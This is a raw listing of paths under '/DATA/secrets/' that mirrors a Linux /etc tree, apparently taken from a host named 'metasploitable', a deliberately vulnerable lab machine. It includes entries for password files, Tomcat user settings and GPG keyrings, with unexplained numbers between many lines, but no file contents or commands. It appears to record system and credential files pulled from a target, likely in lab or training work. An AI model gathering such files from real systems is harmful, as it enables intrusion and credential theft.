/DATA/secrets/xinetd.d/daytime

31
/DATA/secrets/xinetd.d/chargen

30
/DATA/secrets/xinetd.d/vsftpd

28
/DATA/secrets/xinetd.d/time

28
/DATA/secrets/xinetd.d/echo

22
/DATA/secrets/belocs/

37
/DATA/secrets/belocs/locale-gen.conf

33
/DATA/secrets/belocs/iso-639.def

26
/DATA/secrets/ld.so.cache

95
/DATA/secrets/apparmor/
/DATA/secrets/apparmor/logprof.conf
/DATA/secrets/apparmor/severity.db

45
/DATA/secrets/apparmor/rc.apparmor.functions

38
/DATA/secrets/apparmor/subdomain.conf

90
/DATA/secrets/samba/
/DATA/secrets/samba/scripts/
/DATA/secrets/samba/scripts/mapusers.sh

29
/DATA/secrets/samba/smb.conf

19
/DATA/secrets/apm/

27
/DATA/secrets/apm/event.d/

35
/DATA/secrets/apm/event.d/20hdparm

30
/DATA/secrets/apm/event.d/ppp

30
/DATA/secrets/bash_completion

37
/DATA/secrets/bindresvport.blacklist

19
/DATA/secrets/mtab

22
/DATA/secrets/distcc/

18
/DATA/secrets/rpc

26
/DATA/secrets/resolvconf/

40
/DATA/secrets/resolvconf/update-libc.d/

47
/DATA/secrets/resolvconf/update-libc.d/postfix

29
/DATA/secrets/console-tools/

34
/DATA/secrets/console-tools/remap

35
/DATA/secrets/console-tools/config

19
/DATA/secrets/motd

24
/DATA/secrets/host.conf

25
/DATA/secrets/login.defs

22
/DATA/secrets/pcmcia/

33
/DATA/secrets/pcmcia/config.opts

24
/DATA/secrets/calendar/

31
/DATA/secrets/calendar/default

21
/DATA/secrets/group-

22
/DATA/secrets/crontab

70
/DATA/secrets/jvm.d/
/DATA/secrets/printcap
/DATA/secrets/ltrace.conf

111
/DATA/secrets/lsb-base/
/DATA/secrets/rcS.d/
/DATA/secrets/rcS.d/S85urandom
/DATA/secrets/rcS.d/S35mountall.sh

741
/DATA/secrets/rcS.d/README
/DATA/secrets/rcS.d/S22mtab.sh
/DATA/secrets/rcS.d/S55dns-clean
/DATA/secrets/rcS.d/S37udev-finish
/DATA/secrets/rcS.d/S90console-screen.sh
/DATA/secrets/rcS.d/S39ufw
/DATA/secrets/rcS.d/S36mountall-bootclean.sh
/DATA/secrets/rcS.d/S11mountdevsubfs.sh
/DATA/secrets/rcS.d/S40networking
/DATA/secrets/rcS.d/S02hostname.sh
/DATA/secrets/rcS.d/S49console-setup
/DATA/secrets/rcS.d/S46mountnfs-bootclean.sh
/DATA/secrets/rcS.d/S43portmap
/DATA/secrets/rcS.d/S55pppd-dns
/DATA/secrets/rcS.d/S15module-init-tools
/DATA/secrets/rcS.d/S30checkfs.sh
/DATA/secrets/rcS.d/S08loopback
/DATA/secrets/rcS.d/S45waitnfs.sh
/DATA/secrets/rcS.d/S44nfs-common
/DATA/secrets/rcS.d/S70screen-cleanup
/DATA/secrets/rcS.d/S13pcmciautils

384
/DATA/secrets/rcS.d/S80bootmisc.sh
/DATA/secrets/rcS.d/S17procps
/DATA/secrets/rcS.d/S37mountoverflowtmp
/DATA/secrets/rcS.d/S11hwclock.sh
/DATA/secrets/rcS.d/S08hwclockfirst.sh
/DATA/secrets/rcS.d/S70x11-common
/DATA/secrets/rcS.d/S20checkroot.sh
/DATA/secrets/rcS.d/S10udev
/DATA/secrets/rcS.d/S37apparmor
/DATA/secrets/rcS.d/S06keyboard-setup
/DATA/secrets/rcS.d/S01mountkernfs.sh

29
/DATA/secrets/manpath.config

91
/DATA/secrets/wgetrc
/DATA/secrets/hesiod.conf
/DATA/secrets/exports
/DATA/secrets/passwd-

292
/DATA/secrets/protocols
/DATA/secrets/services
/DATA/secrets/lvm/
/DATA/secrets/lvm/backup/
/DATA/secrets/lvm/backup/metasploitable
/DATA/secrets/lvm/cache/
/DATA/secrets/lvm/cache/.cache
/DATA/secrets/lvm/lvm.conf
/DATA/secrets/lvm/archive/
/DATA/secrets/lvm/archive/metasploitable_00001.vg

50
/DATA/secrets/lvm/archive/metasploitable_00000.vg

50
/DATA/secrets/lvm/archive/metasploitable_00004.vg

50
/DATA/secrets/lvm/archive/metasploitable_00003.vg

50
/DATA/secrets/lvm/archive/metasploitable_00002.vg

25
/DATA/secrets/ld.so.conf

24
/DATA/secrets/securetty

22
/DATA/secrets/init.d/

25
/DATA/secrets/init.d/rcS

24
/DATA/secrets/init.d/rc

43
/DATA/secrets/init.d/mountnfs-bootclean.sh

25
/DATA/secrets/init.d/atd

28
/DATA/secrets/init.d/README

36
/DATA/secrets/init.d/mountkernfs.sh

27
/DATA/secrets/init.d/mysql

93
/DATA/secrets/init.d/halt
/DATA/secrets/init.d/x11-common
/DATA/secrets/init.d/openbsd-inetd

39
/DATA/secrets/init.d/nfs-kernel-server

26
/DATA/secrets/init.d/cron

32
/DATA/secrets/init.d/nfs-common

30
/DATA/secrets/init.d/glibc.sh

36
/DATA/secrets/init.d/keyboard-setup

27
/DATA/secrets/init.d/bind9

28
/DATA/secrets/init.d/xinetd

29
/DATA/secrets/init.d/postfix

30
/DATA/secrets/init.d/apparmor

27
/DATA/secrets/init.d/samba

31
/DATA/secrets/init.d/killprocs

33
/DATA/secrets/init.d/bootmisc.sh

30
/DATA/secrets/init.d/loopback

33
/DATA/secrets/init.d/udev-finish

29
/DATA/secrets/init.d/urandom

88
/DATA/secrets/init.d/stop-bootlogd-single
/DATA/secrets/init.d/xserver-xorg-input-wacom

28
/DATA/secrets/init.d/distcc

32
/DATA/secrets/init.d/umountroot

28
/DATA/secrets/init.d/reboot

39
/DATA/secrets/init.d/module-init-tools

36
/DATA/secrets/init.d/postgresql-8.3

30
/DATA/secrets/init.d/pppd-dns

30
/DATA/secrets/init.d/umountfs

32
/DATA/secrets/init.d/waitnfs.sh

32
/DATA/secrets/init.d/networking

31
/DATA/secrets/init.d/rmnologin

31
/DATA/secrets/init.d/mysql-ndb

31
/DATA/secrets/init.d/tomcat5.5

33
/DATA/secrets/init.d/mountall.sh

28
/DATA/secrets/init.d/single

26
/DATA/secrets/init.d/udev

30
/DATA/secrets/init.d/sendsigs

29
/DATA/secrets/init.d/proftpd

29
/DATA/secrets/init.d/apache2

39
/DATA/secrets/init.d/console-screen.sh

23
/DATA/secrets/init.d/a

33
/DATA/secrets/init.d/hostname.sh

35
/DATA/secrets/init.d/stop-bootlogd

34
/DATA/secrets/init.d/checkroot.sh

32
/DATA/secrets/init.d/hwclock.sh

34
/DATA/secrets/init.d/wpa-ifupdown

33
/DATA/secrets/init.d/pcmciautils

32
/DATA/secrets/init.d/checkfs.sh

30
/DATA/secrets/init.d/rc.local

38
/DATA/secrets/init.d/mountoverflowtmp

31
/DATA/secrets/init.d/bootclean

30
/DATA/secrets/init.d/sysklogd

25
/DATA/secrets/init.d/ufw

30
/DATA/secrets/init.d/skeleton

27
/DATA/secrets/init.d/snmpd

43
/DATA/secrets/init.d/mountall-bootclean.sh

29
/DATA/secrets/init.d/mtab.sh

36
/DATA/secrets/init.d/screen-cleanup

35
/DATA/secrets/init.d/console-setup

28
/DATA/secrets/init.d/procps

37
/DATA/secrets/init.d/hwclockfirst.sh

38
/DATA/secrets/init.d/mountdevsubfs.sh

30
/DATA/secrets/init.d/bootlogd

31
/DATA/secrets/init.d/dns-clean

27
/DATA/secrets/init.d/klogd

25
/DATA/secrets/init.d/ssh

35
/DATA/secrets/init.d/mysql-ndb-mgm

29
/DATA/secrets/init.d/portmap

34
/DATA/secrets/init.d/umountnfs.sh

27
/DATA/secrets/init.d/rsync

20
/DATA/secrets/ldap/

29
/DATA/secrets/ldap/ldap.conf

20
/DATA/secrets/snmp/

30
/DATA/secrets/snmp/snmpd.conf

34
/DATA/secrets/snmp/snmptrapd.conf

29
/DATA/secrets/logrotate.conf

20
/DATA/secrets/skel/

28
/DATA/secrets/skel/.profile

27
/DATA/secrets/skel/.bashrc

32
/DATA/secrets/skel/.bash_logout

20
/DATA/secrets/magic

22
/DATA/secrets/purple/

31
/DATA/secrets/purple/prefs.xml

25
/DATA/secrets/tomcat5.5/

35
/DATA/secrets/tomcat5.5/server.xml

44
/DATA/secrets/tomcat5.5/catalina.properties

34
/DATA/secrets/tomcat5.5/Catalina/

44
/DATA/secrets/tomcat5.5/Catalina/localhost/

237
/DATA/secrets/tomcat5.5/Catalina/localhost/servlets-examples.xml
/DATA/secrets/tomcat5.5/Catalina/localhost/jsp-examples.xml
/DATA/secrets/tomcat5.5/Catalina/localhost/tomcat-docs.xml
/DATA/secrets/tomcat5.5/Catalina/localhost/admin.xml

110
/DATA/secrets/tomcat5.5/Catalina/localhost/balancer.xml
/DATA/secrets/tomcat5.5/Catalina/localhost/webdav.xml

60
/DATA/secrets/tomcat5.5/Catalina/localhost/host-manager.xml

55
/DATA/secrets/tomcat5.5/Catalina/localhost/manager.xml

52
/DATA/secrets/tomcat5.5/Catalina/localhost/ROOT.xml

70
/DATA/secrets/tomcat5.5/tomcat5.5
/DATA/secrets/tomcat5.5/context.xml

32
/DATA/secrets/tomcat5.5/web.xml

34
/DATA/secrets/tomcat5.5/policy.d/

48
/DATA/secrets/tomcat5.5/policy.d/10admin.policy

49
/DATA/secrets/tomcat5.5/policy.d/02debian.policy

50
/DATA/secrets/tomcat5.5/policy.d/04webapps.policy

47
/DATA/secrets/tomcat5.5/policy.d/50user.policy

49
/DATA/secrets/tomcat5.5/policy.d/01system.policy

51
/DATA/secrets/tomcat5.5/policy.d/03catalina.policy

40
/DATA/secrets/tomcat5.5/catalina.policy

41
/DATA/secrets/tomcat5.5/tomcat-users.xml

43
/DATA/secrets/tomcat5.5/logging.properties

43
/DATA/secrets/tomcat5.5/server-minimal.xml

29
/DATA/secrets/debian_version

1435
/DATA/secrets/inputrc
/DATA/secrets/fdmount.conf
/DATA/secrets/inetd.conf
/DATA/secrets/modprobe.d/
/DATA/secrets/modprobe.d/blacklist
/DATA/secrets/modprobe.d/aliases
/DATA/secrets/modprobe.d/arch/
/DATA/secrets/modprobe.d/arch/i386
/DATA/secrets/modprobe.d/arch-aliases
/DATA/secrets/modprobe.d/options
/DATA/secrets/modprobe.d/blacklist-framebuffer
/DATA/secrets/modprobe.d/fuse
/DATA/secrets/modprobe.d/blacklist-watchdog
/DATA/secrets/modprobe.d/isapnp
/DATA/secrets/nsswitch.conf
/DATA/secrets/cron.daily/
/DATA/secrets/cron.daily/tomcat55
/DATA/secrets/cron.daily/bsdmainutils
/DATA/secrets/cron.daily/samba
/DATA/secrets/cron.daily/aptitude
/DATA/secrets/cron.daily/mlocate
/DATA/secrets/cron.daily/standard
/DATA/secrets/cron.daily/man-db
/DATA/secrets/cron.daily/apache2
/DATA/secrets/cron.daily/apt
/DATA/secrets/cron.daily/.placeholder
/DATA/secrets/cron.daily/sysklogd
/DATA/secrets/cron.daily/logrotate
/DATA/secrets/dpkg/
/DATA/secrets/dpkg/shlibs.override
/DATA/secrets/dpkg/dpkg.cfg
/DATA/secrets/dpkg/origins/
/DATA/secrets/dpkg/origins/debian
/DATA/secrets/dpkg/shlibs.default
/DATA/secrets/udev/
/DATA/secrets/udev/udev.conf
/DATA/secrets/udev/rules.d/
/DATA/secrets/udev/rules.d/README
/DATA/secrets/udev/rules.d/85-ifupdown.rules
/DATA/secrets/udev/rules.d/65-dmsetup.rules
/DATA/secrets/udev/rules.d/30-cdrom_id.rules
/DATA/secrets/udev/rules.d/95-udev-late.rules
/DATA/secrets/udev/rules.d/40-permissions.rules

45
/DATA/secrets/udev/rules.d/60-symlinks.rules

45
/DATA/secrets/udev/rules.d/80-programs.rules

54
/DATA/secrets/udev/rules.d/40-basic-permissions.rules

41
/DATA/secrets/udev/rules.d/45-fuse.rules

44
/DATA/secrets/udev/rules.d/05-options.rules

376
/DATA/secrets/udev/rules.d/85-pcmcia.rules
/DATA/secrets/udev/rules.d/85-lvm2.rules
/DATA/secrets/udev/rules.d/90-modprobe.rules
/DATA/secrets/udev/rules.d/75-cd-aliases-generator.rules
/DATA/secrets/udev/rules.d/85-hwclock.rules
/DATA/secrets/udev/rules.d/20-names.rules
/DATA/secrets/udev/rules.d/85-hdparm.rules
/DATA/secrets/udev/rules.d/50-xserver-xorg-input-wacom.rules

47
/DATA/secrets/udev/rules.d/05-udev-early.rules

24
/DATA/secrets/ftpchroot

27
/DATA/secrets/cron.hourly/

39
/DATA/secrets/cron.hourly/.placeholder

435
/DATA/secrets/issue.net
/DATA/secrets/.pwd.lock
/DATA/secrets/rmt
/DATA/secrets/profile
/DATA/secrets/updatedb.conf
/DATA/secrets/menu-methods/
/DATA/secrets/menu-methods/README
/DATA/secrets/menu-methods/menu.config
/DATA/secrets/menu-methods/lang.h
/DATA/secrets/menu-methods/menu.h
/DATA/secrets/menu-methods/translate_menus
/DATA/secrets/menu-methods/fluxbox
/DATA/secrets/wpa_supplicant/
/DATA/secrets/wpa_supplicant/functions.sh

41
/DATA/secrets/wpa_supplicant/ifupdown.sh

301
/DATA/secrets/defoma/
/DATA/secrets/defoma/ps-cset-enc.data
/DATA/secrets/defoma/fontconfig.subst-rule
/DATA/secrets/defoma/hints/
/DATA/secrets/defoma/hints/ttf-dejavu-extra.hints
/DATA/secrets/defoma/hints/ttf-dejavu-core.hints
/DATA/secrets/defoma/loc-cset.data
/DATA/secrets/defoma/xenc-cset.data

40
/DATA/secrets/defoma/csetenc-xenc.data2

29
/DATA/secrets/defoma/config/

39
/DATA/secrets/defoma/config/pango.conf

21
/DATA/secrets/rc5.d/

27
/DATA/secrets/rc5.d/README

301
/DATA/secrets/rc5.d/S11klogd
/DATA/secrets/rc5.d/S17portmap
/DATA/secrets/rc5.d/S20nfs-common
/DATA/secrets/rc5.d/S10sysklogd
/DATA/secrets/rc5.d/S16ssh
/DATA/secrets/rc5.d/S20distcc
/DATA/secrets/rc5.d/S50proftpd
/DATA/secrets/rc5.d/S20samba
/DATA/secrets/rc5.d/S15bind9
/DATA/secrets/rc5.d/S20snmpd

300
/DATA/secrets/rc5.d/S10xserver-xorg-input-wacom
/DATA/secrets/rc5.d/S99rc.local
/DATA/secrets/rc5.d/S18mysql-ndb
/DATA/secrets/rc5.d/S99rmnologin
/DATA/secrets/rc5.d/S20rsync
/DATA/secrets/rc5.d/S20xinetd
/DATA/secrets/rc5.d/S91apache2
/DATA/secrets/rc5.d/S89atd
/DATA/secrets/rc5.d/S17mysql-ndb-mgm

196
/DATA/secrets/rc5.d/S89cron
/DATA/secrets/rc5.d/S19mysql
/DATA/secrets/rc5.d/S20openbsd-inetd
/DATA/secrets/rc5.d/S90tomcat5.5
/DATA/secrets/rc5.d/S19postgresql-8.3
/DATA/secrets/rc5.d/S20postfix

41
/DATA/secrets/rc5.d/S20nfs-kernel-server

31
/DATA/secrets/initramfs-tools/

38
/DATA/secrets/initramfs-tools/modules

39
/DATA/secrets/initramfs-tools/scripts/

52
/DATA/secrets/initramfs-tools/scripts/local-bottom/

52
/DATA/secrets/initramfs-tools/scripts/nfs-premount/

50
/DATA/secrets/initramfs-tools/scripts/nfs-bottom/

48
/DATA/secrets/initramfs-tools/scripts/init-top/

51
/DATA/secrets/initramfs-tools/scripts/init-bottom/

54
/DATA/secrets/initramfs-tools/scripts/local-premount/

53
/DATA/secrets/initramfs-tools/scripts/init-premount/

47
/DATA/secrets/initramfs-tools/scripts/nfs-top/

49
/DATA/secrets/initramfs-tools/scripts/local-top/

52
/DATA/secrets/initramfs-tools/update-initramfs.conf

37
/DATA/secrets/initramfs-tools/hooks/

38
/DATA/secrets/initramfs-tools/conf.d/

44
/DATA/secrets/initramfs-tools/conf.d/resume

45
/DATA/secrets/initramfs-tools/initramfs.conf

21
/DATA/secrets/rc6.d/

27
/DATA/secrets/rc6.d/README

31
/DATA/secrets/rc6.d/K50proftpd

467
/DATA/secrets/rc6.d/K20distcc
/DATA/secrets/rc6.d/K21mysql
/DATA/secrets/rc6.d/K25hwclock.sh
/DATA/secrets/rc6.d/S32portmap
/DATA/secrets/rc6.d/K22mysql-ndb
/DATA/secrets/rc6.d/K20openbsd-inetd
/DATA/secrets/rc6.d/K20postfix
/DATA/secrets/rc6.d/S60umountroot
/DATA/secrets/rc6.d/S31umountnfs.sh
/DATA/secrets/rc6.d/K59mountoverflowtmp
/DATA/secrets/rc6.d/K23mysql-ndb-mgm
/DATA/secrets/rc6.d/K20xinetd
/DATA/secrets/rc6.d/S40umountfs
/DATA/secrets/rc6.d/K10tomcat5.5

27
/DATA/secrets/rc6.d/K39ufw

205
/DATA/secrets/rc6.d/S15wpa-ifupdown
/DATA/secrets/rc6.d/K09apache2
/DATA/secrets/rc6.d/K85bind9
/DATA/secrets/rc6.d/K80nfs-kernel-server
/DATA/secrets/rc6.d/K21postgresql-8.3
/DATA/secrets/rc6.d/S90reboot

126
/DATA/secrets/rc6.d/K20nfs-common
/DATA/secrets/rc6.d/S30urandom
/DATA/secrets/rc6.d/S20sendsigs
/DATA/secrets/rc6.d/K19samba

26
/DATA/secrets/resolv.conf

21
/DATA/secrets/dhcp3/

43
/DATA/secrets/dhcp3/dhclient-exit-hooks.d/

50
/DATA/secrets/dhcp3/dhclient-exit-hooks.d/ntpdate

48
/DATA/secrets/dhcp3/dhclient-exit-hooks.d/debug

186
/DATA/secrets/dhcp3/dhclient.conf.dpkg-dist
/DATA/secrets/dhcp3/dhclient-enter-hooks.d/
/DATA/secrets/dhcp3/dhclient-enter-hooks.d/samba
/DATA/secrets/dhcp3/dhclient-enter-hooks.d/debug

34
/DATA/secrets/dhcp3/dhclient.conf

26
/DATA/secrets/e2fsck.conf

23
/DATA/secrets/gtk-2.0/

41
/DATA/secrets/gtk-2.0/im-multipress.conf

23
/DATA/secrets/network/

31
/DATA/secrets/network/if-up.d/

38
/DATA/secrets/network/if-up.d/ntpdate

89
/DATA/secrets/network/if-up.d/wpasupplicant
/DATA/secrets/network/if-up.d/openssh-server

38
/DATA/secrets/network/if-up.d/postfix

44
/DATA/secrets/network/if-up.d/mountnfs.orig

39
/DATA/secrets/network/if-up.d/mountnfs

33
/DATA/secrets/network/interfaces

38
/DATA/secrets/network/if-post-down.d/

103
/DATA/secrets/network/if-post-down.d/wpasupplicant
/DATA/secrets/network/if-post-down.d/wireless-tools

35
/DATA/secrets/network/if-pre-up.d/

97
/DATA/secrets/network/if-pre-up.d/wpasupplicant
/DATA/secrets/network/if-pre-up.d/wireless-tools

33
/DATA/secrets/network/if-down.d/

86
/DATA/secrets/network/if-down.d/wpasupplicant
/DATA/secrets/network/if-down.d/postfix

23
/DATA/secrets/proftpd/

35
/DATA/secrets/proftpd/proftpd.conf

31
/DATA/secrets/proftpd/sql.conf

31
/DATA/secrets/proftpd/tls.conf

35
/DATA/secrets/proftpd/modules.conf

32
/DATA/secrets/proftpd/ldap.conf

26
/DATA/secrets/hosts.allow

23
/DATA/secrets/apache2/

33
/DATA/secrets/apache2/ports.conf

38
/DATA/secrets/apache2/mods-available/

51
/DATA/secrets/apache2/mods-available/setenvif.conf

54
/DATA/secrets/apache2/mods-available/negotiation.conf

52
/DATA/secrets/apache2/mods-available/authn_dbd.load

47
/DATA/secrets/apache2/mods-available/ldap.load

53
/DATA/secrets/apache2/mods-available/substitute.load

47
/DATA/secrets/apache2/mods-available/mime.conf

48
/DATA/secrets/apache2/mods-available/alias.conf

53
/DATA/secrets/apache2/mods-available/authn_file.load

56
/DATA/secrets/apache2/mods-available/authz_default.load

58
/DATA/secrets/apache2/mods-available/authz_groupfile.load

50
/DATA/secrets/apache2/mods-available/deflate.load

49
/DATA/secrets/apache2/mods-available/dav_fs.load

53
/DATA/secrets/apache2/mods-available/ext_filter.load

47
/DATA/secrets/apache2/mods-available/asis.load

55
/DATA/secrets/apache2/mods-available/log_forensic.load

56
/DATA/secrets/apache2/mods-available/authn_default.load

46
/DATA/secrets/apache2/mods-available/dir.conf

47
/DATA/secrets/apache2/mods-available/php5.conf

55
/DATA/secrets/apache2/mods-available/charset_lite.load

53
/DATA/secrets/apache2/mods-available/mime_magic.conf

48
/DATA/secrets/apache2/mods-available/proxy.conf

53
/DATA/secrets/apache2/mods-available/auth_basic.load

48
/DATA/secrets/apache2/mods-available/cache.load

46
/DATA/secrets/apache2/mods-available/dbd.load

54
/DATA/secrets/apache2/mods-available/authz_owner.load

46
/DATA/secrets/apache2/mods-available/env.load

56
/DATA/secrets/apache2/mods-available/proxy_connect.load

48
/DATA/secrets/apache2/mods-available/alias.load

53
/DATA/secrets/apache2/mods-available/authn_anon.load

49
/DATA/secrets/apache2/mods-available/status.load

50
/DATA/secrets/apache2/mods-available/dump_io.load

52
/DATA/secrets/apache2/mods-available/autoindex.load

52
/DATA/secrets/apache2/mods-available/mem_cache.load

46
/DATA/secrets/apache2/mods-available/ssl.load

52
/DATA/secrets/apache2/mods-available/cern_meta.load

53
/DATA/secrets/apache2/mods-available/file_cache.load

50
/DATA/secrets/apache2/mods-available/speling.load

54
/DATA/secrets/apache2/mods-available/vhost_alias.load

50
/DATA/secrets/apache2/mods-available/expires.load

53
/DATA/secrets/apache2/mods-available/proxy_http.load

53
/DATA/secrets/apache2/mods-available/disk_cache.conf

47
/DATA/secrets/apache2/mods-available/mime.load

53
/DATA/secrets/apache2/mods-available/authz_user.load

49
/DATA/secrets/apache2/mods-available/filter.load

52
/DATA/secrets/apache2/mods-available/proxy_ajp.load

46
/DATA/secrets/apache2/mods-available/dav.load

54
/DATA/secrets/apache2/mods-available/negotiation.load

54
/DATA/secrets/apache2/mods-available/authn_alias.load

51
/DATA/secrets/apache2/mods-available/setenvif.load

47
/DATA/secrets/apache2/mods-available/cgid.conf

47
/DATA/secrets/apache2/mods-available/php5.load

1048
/DATA/secrets/apache2/mods-available/authnz_ldap.load
/DATA/secrets/apache2/mods-available/headers.load
/DATA/secrets/apache2/mods-available/authn_dbm.load
/DATA/secrets/apache2/mods-available/cgid.load
/DATA/secrets/apache2/mods-available/cgi.load
/DATA/secrets/apache2/mods-available/proxy_ftp.load
/DATA/secrets/apache2/mods-available/actions.conf
/DATA/secrets/apache2/mods-available/autoindex.conf
/DATA/secrets/apache2/mods-available/userdir.load
/DATA/secrets/apache2/mods-available/dav_lock.load
/DATA/secrets/apache2/mods-available/rewrite.load
/DATA/secrets/apache2/mods-available/ident.load
/DATA/secrets/apache2/mods-available/authz_dbm.load
/DATA/secrets/apache2/mods-available/dir.load
/DATA/secrets/apache2/mods-available/unique_id.load
/DATA/secrets/apache2/mods-available/userdir.conf
/DATA/secrets/apache2/mods-available/ssl.conf
/DATA/secrets/apache2/mods-available/authz_host.load
/DATA/secrets/apache2/mods-available/imagemap.load
/DATA/secrets/apache2/mods-available/status.conf
/DATA/secrets/apache2/mods-available/info.load

50
/DATA/secrets/apache2/mods-available/version.load

47
/DATA/secrets/apache2/mods-available/info.conf

54
/DATA/secrets/apache2/mods-available/auth_digest.load

52
/DATA/secrets/apache2/mods-available/mem_cache.conf

411
/DATA/secrets/apache2/mods-available/proxy_balancer.load
/DATA/secrets/apache2/mods-available/usertrack.load
/DATA/secrets/apache2/mods-available/suexec.load
/DATA/secrets/apache2/mods-available/include.load
/DATA/secrets/apache2/mods-available/proxy.load
/DATA/secrets/apache2/mods-available/disk_cache.load
/DATA/secrets/apache2/mods-available/dav_fs.conf
/DATA/secrets/apache2/mods-available/mime_magic.load

50
/DATA/secrets/apache2/mods-available/actions.load

50
/DATA/secrets/apache2/mods-available/deflate.conf

36
/DATA/secrets/apache2/mods-enabled/

297
/DATA/secrets/apache2/mods-enabled/setenvif.conf
/DATA/secrets/apache2/mods-enabled/negotiation.conf
/DATA/secrets/apache2/mods-enabled/mime.conf
/DATA/secrets/apache2/mods-enabled/alias.conf
/DATA/secrets/apache2/mods-enabled/authn_file.load
/DATA/secrets/apache2/mods-enabled/authz_default.load

100
/DATA/secrets/apache2/mods-enabled/authz_groupfile.load
/DATA/secrets/apache2/mods-enabled/php.conf

47
/DATA/secrets/apache2/mods-enabled/dav_fs.load

327
/DATA/secrets/apache2/mods-enabled/dir.conf
/DATA/secrets/apache2/mods-enabled/auth_basic.load
/DATA/secrets/apache2/mods-enabled/env.load
/DATA/secrets/apache2/mods-enabled/alias.load
/DATA/secrets/apache2/mods-enabled/status.load
/DATA/secrets/apache2/mods-enabled/autoindex.load
/DATA/secrets/apache2/mods-enabled/mime.load

196
/DATA/secrets/apache2/mods-enabled/authz_user.load
/DATA/secrets/apache2/mods-enabled/dav.load
/DATA/secrets/apache2/mods-enabled/negotiation.load
/DATA/secrets/apache2/mods-enabled/setenvif.load

44
/DATA/secrets/apache2/mods-enabled/cgi.load

48
/DATA/secrets/apache2/mods-enabled/actions.conf

241
/DATA/secrets/apache2/mods-enabled/autoindex.conf
/DATA/secrets/apache2/mods-enabled/dav_lock.load
/DATA/secrets/apache2/mods-enabled/dir.load
/DATA/secrets/apache2/mods-enabled/authz_host.load
/DATA/secrets/apache2/mods-enabled/status.conf

95
/DATA/secrets/apache2/mods-enabled/dav_fs.conf
/DATA/secrets/apache2/mods-enabled/actions.load

30
/DATA/secrets/apache2/envvars

39
/DATA/secrets/apache2/sites-available/

46
/DATA/secrets/apache2/sites-available/default

33
/DATA/secrets/apache2/httpd.conf

37
/DATA/secrets/apache2/sites-enabled/

48
/DATA/secrets/apache2/sites-enabled/000-default

30
/DATA/secrets/apache2/conf.d/

37
/DATA/secrets/apache2/conf.d/charset

35
/DATA/secrets/apache2/apache2.conf

21
/DATA/secrets/fonts/

30
/DATA/secrets/fonts/fonts.dtd

31
/DATA/secrets/fonts/fonts.conf

32
/DATA/secrets/fonts/conf.avail/

44
/DATA/secrets/fonts/conf.avail/50-user.conf

38
/DATA/secrets/fonts/conf.avail/README

57
/DATA/secrets/fonts/conf.avail/20-unhint-small-vera.conf

48
/DATA/secrets/fonts/conf.avail/10-unhinted.conf

49
/DATA/secrets/fonts/conf.avail/10-antialias.conf

56
/DATA/secrets/fonts/conf.avail/52-languageselector.conf

51
/DATA/secrets/fonts/conf.avail/70-yes-bitmaps.conf

54
/DATA/secrets/fonts/conf.avail/10-sub-pixel-vrgb.conf

60
/DATA/secrets/fonts/conf.avail/53-monospace-lcd-filter.conf

52
/DATA/secrets/fonts/conf.avail/10-hinting-full.conf

54
/DATA/secrets/fonts/conf.avail/10-hinting-medium.conf

50
/DATA/secrets/fonts/conf.avail/70-no-bitmaps.conf

54
/DATA/secrets/fonts/conf.avail/10-hinting-slight.conf

55
/DATA/secrets/fonts/conf.avail/25-unhint-nonlatin.conf

47
/DATA/secrets/fonts/conf.avail/10-hinting.conf

49
/DATA/secrets/fonts/conf.avail/49-sansserif.conf

54
/DATA/secrets/fonts/conf.avail/10-sub-pixel-vbgr.conf

48
/DATA/secrets/fonts/conf.avail/40-nonlatin.conf

47
/DATA/secrets/fonts/conf.avail/69-unifont.conf

45
/DATA/secrets/fonts/conf.avail/60-latin.conf

53
/DATA/secrets/fonts/conf.avail/65-fonts-persian.conf

52
/DATA/secrets/fonts/conf.avail/10-no-sub-pixel.conf

347
/DATA/secrets/fonts/conf.avail/30-metric-aliases.conf
/DATA/secrets/fonts/conf.avail/10-sub-pixel-rgb.conf
/DATA/secrets/fonts/conf.avail/45-latin.conf
/DATA/secrets/fonts/conf.avail/90-synthetic.conf
/DATA/secrets/fonts/conf.avail/51-local.conf
/DATA/secrets/fonts/conf.avail/65-nonlatin.conf
/DATA/secrets/fonts/conf.avail/10-sub-pixel-bgr.conf

48
/DATA/secrets/fonts/conf.avail/10-autohint.conf

57
/DATA/secrets/fonts/conf.avail/20-fix-globaladvance.conf

51
/DATA/secrets/fonts/conf.avail/30-urw-aliases.conf

49
/DATA/secrets/fonts/conf.avail/80-delicious.conf

28
/DATA/secrets/fonts/conf.d/

135
/DATA/secrets/fonts/conf.d/50-user.conf
/DATA/secrets/fonts/conf.d/20-unhint-small-vera.conf
/DATA/secrets/fonts/conf.d/30-defoma.conf

97
/DATA/secrets/fonts/conf.d/10-antialias.conf
/DATA/secrets/fonts/conf.d/52-languageselector.conf

56
/DATA/secrets/fonts/conf.d/53-monospace-lcd-filter.conf

139
/DATA/secrets/fonts/conf.d/10-hinting-medium.conf
/DATA/secrets/fonts/conf.d/70-no-bitmaps.conf
/DATA/secrets/fonts/conf.d/10-hinting.conf

45
/DATA/secrets/fonts/conf.d/49-sansserif.conf

225
/DATA/secrets/fonts/conf.d/40-nonlatin.conf
/DATA/secrets/fonts/conf.d/69-unifont.conf
/DATA/secrets/fonts/conf.d/60-latin.conf
/DATA/secrets/fonts/conf.d/65-fonts-persian.conf
/DATA/secrets/fonts/conf.d/10-no-sub-pixel.conf

136
/DATA/secrets/fonts/conf.d/30-metric-aliases.conf
/DATA/secrets/fonts/conf.d/45-latin.conf
/DATA/secrets/fonts/conf.d/90-synthetic.conf

230
/DATA/secrets/fonts/conf.d/51-local.conf
/DATA/secrets/fonts/conf.d/65-nonlatin.conf
/DATA/secrets/fonts/conf.d/20-fix-globaladvance.conf
/DATA/secrets/fonts/conf.d/30-urw-aliases.conf
/DATA/secrets/fonts/conf.d/80-delicious.conf

19
/DATA/secrets/apt/

34
/DATA/secrets/apt/sources.list.d/

30
/DATA/secrets/apt/trusted.gpg

32
/DATA/secrets/apt/sources.list~

30
/DATA/secrets/apt/apt.conf.d/

40
/DATA/secrets/apt/apt.conf.d/05aptitude

39
/DATA/secrets/apt/apt.conf.d/70debconf

38
/DATA/secrets/apt/apt.conf.d/01ubuntu

42
/DATA/secrets/apt/apt.conf.d/00trustcdrom

42
/DATA/secrets/apt/apt.conf.d/01autoremove

31
/DATA/secrets/apt/trusted.gpg~

30
/DATA/secrets/apt/trustdb.gpg

30
/DATA/secrets/apt/secring.gpg

31
/DATA/secrets/apt/sources.list

21
/DATA/secrets/nanorc

22
/DATA/secrets/grub.d/

35
/DATA/secrets/grub.d/20_memtest86+

22
/DATA/secrets/python/

35
